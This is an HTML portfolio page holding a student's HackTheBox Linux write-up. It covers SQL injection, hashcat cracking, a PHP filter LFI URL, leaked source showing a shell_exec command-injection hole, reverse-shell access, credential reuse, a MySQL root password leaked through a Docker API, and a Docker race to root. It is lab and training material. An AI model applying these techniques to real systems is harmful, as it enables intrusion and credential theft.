          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
